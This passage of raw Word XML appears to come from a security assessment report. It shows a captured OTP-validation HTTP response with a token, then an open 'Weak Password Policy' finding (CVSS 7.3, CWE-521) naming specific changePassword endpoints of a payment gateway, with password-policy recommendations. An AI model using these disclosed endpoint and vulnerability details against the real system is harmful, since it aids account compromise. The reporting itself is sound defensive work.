          <w:p w14:paraId="266AFAF2" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="00F64CC0" w:rsidRDefault="004B23AC" w:rsidP="004B23AC">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64CC0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response 2:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00F54571" w:rsidRPr="00F54571" w14:paraId="3CA0A99C" w14:textId="77777777" w:rsidTr="00F64CC0">
              <w:trPr>
                <w:trHeight w:val="1885"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="7129ECAE" w14:textId="77777777" w:rsidR="00F54571" w:rsidRPr="00F54571" w:rsidRDefault="00F54571" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7069B616" w14:textId="77777777" w:rsidR="00F54571" w:rsidRPr="00F54571" w:rsidRDefault="00F54571" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Thu, 30 May 2019 17:58:12 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="227B52F8" w14:textId="77777777" w:rsidR="00F54571" w:rsidRPr="00F54571" w:rsidRDefault="00F54571" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="702ABA00" w14:textId="77777777" w:rsidR="00F54571" w:rsidRPr="00F54571" w:rsidRDefault="00F54571" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 227</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="322E7DE6" w14:textId="77777777" w:rsidR="00F54571" w:rsidRPr="00F54571" w:rsidRDefault="00F54571" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>valid":"true</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","secureAuthResponse":{"throttleAudit":{"status":"found"},"validateOtpAudit":{"status":"valid","message":"5/30/2019 5:57:50 PM"},"usersAudit":{"status":"found"}},"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>validateOtpToken":"WNpbmd2YWxpZGF0ZW90cA==anRyY</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F54571">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7A97A354" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11689A3B" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F18B5E" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="529479CA" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="717C8F5B" w14:textId="33B5A0FA" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="004C0B57">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_Toc10703666"/>
            <w:r>
              <w:t>H</w:t>
            </w:r>
            <w:r w:rsidR="004C0B57">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Weak Password Policy</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0EB0DFC0" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25110B3B"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19E8AFE7" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:anchor="CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00841CE5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>7.3</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="00D42D01" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="32849062"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="22A3CBF5" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-521: Weak Password Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="5859FFAC" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CF3F46"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37BB5E50" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00914B7E" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gofundhip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/secure/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>changePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2A1DE800" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00397EF0" w:rsidRDefault="00914B7E" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00914B7E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>changePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="12A60057" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0FB241C1"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="44913B8A" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="73CA0E5D" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0567CFF8"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA1FFB5" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase (Architecture and Design) - Enforce usage of strong passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33DBBFCF" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">At a minimum per Anthem's security policy (IAM.41-P05.S23), the following password maintenance requirements apply to the creation, use, and maintenance of passwords associated with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eBusiness</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> customer accounts:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="105A4830" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Minimum Password Length - eight (8) Characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729000B2" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password should be case sensitive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1977B3C3" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password history retention - Not Required</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20380680" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of different character sets required (alphabetic, numeric) – two (2) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205E1AFE" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007019FF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Password cannot be the same as the Username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553E487B" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007019FF" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
